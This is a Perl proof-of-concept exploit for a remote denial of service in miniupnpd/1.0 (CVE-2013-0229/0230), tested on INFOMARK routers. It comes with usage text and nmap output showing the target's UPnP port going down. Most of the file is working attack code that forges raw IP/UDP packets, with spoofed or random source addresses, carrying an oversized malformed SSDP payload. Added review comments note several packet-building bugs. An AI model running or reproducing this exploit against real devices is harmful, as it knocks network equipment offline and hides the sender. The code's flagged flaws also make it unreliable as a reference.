#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service or stack overflow (PoC)
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol discovers Plug & Play devices
# in UPnP (Universal Plug and Play). SSDP is an HTTP-like
# protocol and works with the NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This and any previous program are for educational
# purposes ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (data loss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#
use Socket;
# The script writes a hand-built IP header through a SOCK_RAW socket,
# which typically requires the superuser; $< is the real UID.
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
# gethostbyname() in list context returns the first packed 4-byte address
# in element 4. $ip_src stays undef when no second argument is given;
# iphdr() checks for that. Both lookups receive @ARGV unvalidated.
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];
print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
# 4-arg select() with undef sets is a sub-second sleep (0.40 s), used
# only to pace the banner output.
select(undef, undef, undef, 0.40);
# Missing or unresolvable first argument: print usage and exit (status 0).
if (!defined $ip_dst) {
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
select(undef, undef, undef, 0.55);
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
print "[ Example:\n[ perl $0 192.168.1.1\n";
print "[ =============================================== ]\n";
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
exit;
}
# Raw IPv4 socket with the protocol given numerically as 255. RAW is a
# bareword (package-global) handle that send_packet() reuses. The
# setsockopt() arguments are bare numbers (level 0, option 1, value 1);
# which option that selects depends on the platform's header values —
# NOTE(review): confirm against the named constants from Socket.
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
- # Main program
sub main {
    # Assemble the datagram front to back: IP header, UDP header, SSDP body.
    # Each helper is evaluated once, in this order.
    my $packet = join '', iphdr(), udphdr(), payload();

    # Hand the finished bytes to the raw socket.
    return send_packet($packet);
}
- # IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP version (4 bits)
my $iphdr_len = 5; # Header length in 32-bit words (4 bits); 5 words = 20 bytes
my $ip_tos = 0; # Type of service (8 bits)
my $ip_total_len = $iphdr_len + 20; # Total length field (16 bits); this is 5 + 20 = 25, not the size of header + data
my $ip_frag_id = 0; # Identification (16 bits)
my $ip_frag_flag = 000; # Flags R/DF/MF (3 bits); an octal literal that evaluates to 0
my $ip_frag_offset = 0000000000000; # Fragment offset (13 bits); also an octal literal, evaluates to 0
my $ip_ttl = 255; # TTL (8 bits); see the 'h2' note on the template below
my $ip_proto = 17; # Protocol (8 bits); 17 is UDP
my $ip_checksum = 0; # Header checksum (16 bits), left at 0 here; whether the sending stack fills it in is platform-specific
# Source address (32 bits): a random one from randip() when the caller
# gave none. NOTE(review): `my ... if COND` is listed in perlsyn as
# undefined behaviour, and this `my` introduces a new lexical that shadows
# the file-level $ip_src, so the value pack() reads below is this inner
# one — confirm which address actually ends up on the wire when a
# second command-line argument was supplied.
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
# Template, field by field:
#   H2     version/IHL from the string "45" (hex digits, high nybble first)
#   H2     TOS from the string "0", left-aligned -> 0x00
#   n n    total length and identification, big-endian 16-bit
#   B16    flags . offset = the string "00", zero-padded to 16 bits
#   h2     TTL: 'h' reads hex digits low nybble first, so only "25" of
#          "255" is consumed -> 0x52 (82), not 255
#   c      protocol, signed 8-bit
#   n      checksum
#   a4 a4  packed source and destination addresses
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$ip_src, $ip_dst
);
return $iphdr;
}
- # UDP header (Layer 4)
sub udphdr {
    # UDP header fields, all 16-bit big-endian. The source port is a fixed
    # constant (31337), which is a recognisable artefact in traffic captures.
    # The length is header (8) plus one freshly generated body; the checksum
    # is sent as 0.
    my %udp_of = (
        src_port => 31337,
        dst_port => 1900,
        len      => 8 + length(payload()),
        checksum => 0,
    );

    my @field_order = qw(src_port dst_port len checksum);
    return pack('n n n n', @udp_of{@field_order});
}
- # Create SSDP Bomb
sub payload {
    # Body of the datagram: the literal text below (note that "\\r\\n" in a
    # double-quoted string yields the four characters backslash, r,
    # backslash, n — not a CRLF), followed by 1261 random bytes in 'A'..'Y'.
    my $body = "M-SEARCH * HTTP\/1.1\\r\\n";
    $body .= join '', map { chr(65 + int(rand(25))) } 0 .. 1260;

    # 'a' with the exact length packs the string unchanged.
    my $packed = pack('a' . length($body), $body);
    return $packed;
}
- # Generate random source ip address
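# Returns a dotted-quad string with four random octets in 0..254.
# Changes from the previous version: the stray "\n" that sat in void
# context after the join() and the unused $ipsrc pack() of a dotted string
# (a numeric-conversion warning) are gone; the returned value is the same.
sub randip () {
    # Reseed from the clock and PID on every call; the seed is predictable.
    srand(time() ^ ($$ + ($$ << 15)));

    # rand(255) is in [0, 255), so int() never yields 255.
    my $ipdata = join '.', map { int(rand(255)) } 1 .. 4;
    return $ipdata;
}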
- # Send the malformed packet
sub send_packet {
# $_[0] is the complete datagram (IP header + UDP header + body) built by
# main(); it is read through the @_ alias rather than copied.
print "[ Target: $ARGV[0]\n";
select(undef, undef, undef, 0.30); # 0.30 s pause, output pacing only
print "[ Send malformed SSDP packet..\n\n";
# Destination sockaddr_in packed by hand: native short family, big-endian
# port 60, the 4-byte address resolved at file scope, 8 bytes of zero
# padding. NOTE(review): the port in this sockaddr is not the UDP port
# (that is set in udphdr()); whether the stack ignores it for a raw socket
# is platform-specific — confirm. RAW is the bareword handle opened at
# file scope; send() returns the byte count, so a failure dies with $!.
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}